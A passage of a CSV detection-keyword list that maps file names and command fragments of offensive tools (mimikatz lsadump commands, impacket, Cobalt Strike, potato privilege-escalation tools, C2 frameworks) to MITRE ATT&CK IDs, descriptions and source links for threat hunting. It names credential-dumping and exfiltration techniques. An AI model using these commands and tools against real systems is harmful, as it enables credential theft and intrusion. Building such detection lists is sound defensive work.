Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*LocalPotato.vcxproj*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*LocalPotato.zip*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*LocalPotato-master*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*localreconmodules*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*localrelay_linux_amd64*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*locate password | more*","greyware_tool_keyword","locate","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*LocateBrc4Config*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*lochiccbgeohimldjooaakjllnafhaid*","greyware_tool_keyword","IP Unblock","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*lockless *.dat*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*LockLess.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Locksmith-main.zip*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" +"*log4_shell.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*log4shell*.nessus.org*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*log4shell.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*LoGiC.NET.exe*","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","N/A","5","483","75","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z" +"*loginsight.thrift*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in 
massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" +"*LogonTracer*","offensive_tool_keyword","LogonTracer","LogonTracer is a tool to investigate malicious logon by visualizing and analyzing Windows Active Directory event logs. This tool associates a host name (or an IP address) and account name found in logon-related events and displays it as a graph. This way. it is possible to see in which account login attempt occurs and which host is used.","T1057 - T1087 - T1208","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/JPCERTCC/LogonTracer","1","0","N/A","N/A","10","2469","445","2023-09-08T13:32:03Z","2017-11-24T06:07:49Z" +"*logs/Responder-Session.log*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*logs/ridenum.log*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*logs/shares-with-SCF.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" 
+"*logs/theHarvester.py.log*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*logToBeaconLog*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*LOLBAS-Project*","offensive_tool_keyword","LOLBAS-Project","Living Off The Land Binaries and Scripts (and also Libraries) malicious use of legitimate tool","T1072 - T1059.003 - T1059.004 - T1059.001 - T1059.005 - 
T1564.001","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://lolbas-project.github.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*LOLBins/NetLoader.xml*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" +"*Londor.exe -t Coverage*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*Londor.exe -t Script*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*looCiprian/GC2-sheet*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" +"*lookupsid.py -hashes :* *@* 0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*lookupsid.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*loot_memory.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*LordNoteworthy*","offensive_tool_keyword","Github Username","Github username of hacker known for malware pocs and windows exploitations","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/LordNoteworthy","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*lotus2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*Lovely-Potato*","offensive_tool_keyword","Lovely-Potato","Lovely Potato (automating juicy potato) Powershell wrapper of Decoders JuicyPotato for easy exploitation. This entirely depends on the original Juicy Potato binary and utilizes his test_clsid.bat. another Local Privilege Escalation tool. from a Windows Service Accounts to NT AUTHORITY\SYSTEM","T1055 - T1547.002 - T1543.003 - T1059.001","TA0004 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/TsukiCTF/Lovely-Potato","1","0","N/A","N/A","2","131","29","2021-07-21T18:09:14Z","2019-05-17T19:37:20Z"
+"*lsa_decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*lsa_decryptor_nt*.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*lsa_secrets.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*lsadump.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
+"*lsadump::*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::backupkeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::cache*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::changentlm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::dcshadow*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::dcsync*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::lsa*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::mbc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::netsync*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::packages*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::postzerologon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::RpData*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::sam*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::secrets*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
